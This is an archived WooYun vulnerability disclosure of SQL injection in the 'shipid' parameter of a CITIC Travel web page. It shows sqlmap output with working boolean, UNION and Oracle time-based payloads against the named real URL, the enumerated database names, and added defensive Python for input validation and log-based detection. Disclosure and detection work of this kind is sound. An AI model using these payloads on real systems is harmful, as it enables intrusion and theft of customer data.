WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online browsing -------- http://drop.zone.ci/
2014-09-28: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed to the public.
2014-11-12: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
The company was founded in 1987 and is a wholly owned subsidiary of CITIC Group. It operates travel agency business covering the inbound, outbound and domestic markets, visa services, and consulting and agency services for Chinese citizens travelling abroad for private purposes, as well as tourism hotel business and tourism resource development. It is a state-licensed designated tour operator for outbound travel by Chinese citizens and one of the first travel agencies designated to operate travel to Taiwan by mainland residents. CITIC Travel Group Co., Ltd. is a national "Top 100 travel agency" and "5A-level travel agency", and one of the first Beijing tourism standardization demonstration units.
1. http://www.travel.citic.com/shipList.jsp?shipid=1660
sqlmap identified the following injection points with a total of 43 HTTP(s) requests:
---
Place: GET
Parameter: shipid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: shipid=1660 AND 8987=8987

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: shipid=-4363 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(104)||CHR(114)||CHR(121)||CHR(113)||CHR(108)||CHR(88)||CHR(83)||CHR(74)||CHR(82)||CHR(89)||CHR(112)||CHR(65)||CHR(89)||CHR(99)||CHR(113)||CHR(97)||CHR(104)||CHR(116)||CHR(113) FROM DUAL--

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: shipid=1660 AND 4003=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(105)||CHR(119)||CHR(66),3)
---
web application technology: Nginx, JSP
back-end DBMS: Oracle

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: shipid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: shipid=1660 AND 8987=8987

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: shipid=-4363 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(104)||CHR(114)||CHR(121)||CHR(113)||CHR(108)||CHR(88)||CHR(83)||CHR(74)||CHR(82)||CHR(89)||CHR(112)||CHR(65)||CHR(89)||CHR(99)||CHR(113)||CHR(97)||CHR(104)||CHR(116)||CHR(113) FROM DUAL--

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: shipid=1660 AND 4003=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(105)||CHR(119)||CHR(66),5)
---
web application technology: Nginx, JSP
back-end DBMS: Oracle
available databases [17]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SUBCITIC
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TRAVELADMIN
[*] TSMSYS
[*] WMSYS
[*] XDB
2. 505 tables
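The three payload classes sqlmap reports above (boolean-based, UNION, Oracle time-based via DBMS_PIPE) all arrive through a single numeric GET parameter, so they are easy both to reject at the application boundary and to pick out of web-server access logs after the fact. The following is an added example written for this page, not code from the report or from the site's own JSP application. The access-log lines, IP addresses and timestamps are constructed; the assumption that shipid must be a positive integer is inferred from the URL shown above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the report). The query
# strings mirror the three payload classes sqlmap reported for "shipid".
SAMPLE_LOG = """\
10.0.0.5 - - [28/Sep/2014:10:00:01 +0800] "GET /shipList.jsp?shipid=1660 HTTP/1.1" 200 5120
10.0.0.5 - - [28/Sep/2014:10:00:02 +0800] "GET /shipList.jsp?shipid=1660%20AND%208987%3D8987 HTTP/1.1" 200 5120
10.0.0.5 - - [28/Sep/2014:10:00:03 +0800] "GET /shipList.jsp?shipid=-4363%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CHR(113)||CHR(104)%20FROM%20DUAL-- HTTP/1.1" 200 5310
10.0.0.5 - - [28/Sep/2014:10:00:09 +0800] "GET /shipList.jsp?shipid=1660%20AND%204003%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(105),5) HTTP/1.1" 200 5120
10.0.0.7 - - [28/Sep/2014:10:01:00 +0800] "GET /shipList.jsp?shipid=abc HTTP/1.1" 500 312
"""

# Common-log-format style line: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Signatures for the payload classes in the report, matched against the
# URL-decoded parameter value. Most specific first, so the time-based payload
# (which also contains "AND n=") is not mis-labelled as boolean-based.
SIGNATURES = [
    ("oracle-time-based", re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I)),
    ("union-query", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
    ("boolean-based", re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+\b", re.I)),
]


def parse_ship_id(raw):
    """Whitelist validation for the parameter: accept only a plain positive
    integer (assumed to be the intended domain of shipid) and return it as
    int, or None. Binding the int to a prepared statement leaves nothing for
    any of the payloads above to attach to."""
    if raw is None or not re.fullmatch(r"\d{1,10}", raw):
        return None
    return int(raw)


def classify_value(value):
    """Label one decoded parameter value by the payload class it resembles."""
    for name, pattern in SIGNATURES:
        if pattern.search(value):
            return name
    return "valid" if parse_ship_id(value) is not None else "malformed"


def analyze_log(text, param="shipid"):
    """Return (client_ip, label) for every request carrying the parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            findings.append((m.group("ip"), classify_value(value)))
    return findings


def summarize(findings):
    """Count labels per client IP, so a scan shows up as one IP with several
    injection classes in a short window."""
    counts = {}
    for ip, label in findings:
        counts.setdefault(ip, {}).setdefault(label, 0)
        counts[ip][label] += 1
    return counts


if __name__ == "__main__":
    for ip, labels in summarize(analyze_log(SAMPLE_LOG)).items():
        print(ip, labels)
```

The validation step is the actual fix: a parameter that only ever means "row id" should be parsed as an integer and bound as one, which removes the string context that the boolean, UNION and DBMS_PIPE payloads rely on. The log classifier is the retrospective check, and a single client producing all three classes within seconds is the footprint of an automated scanner rather than a typo in a URL.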
Unable to contact the vendor, or the vendor actively refused.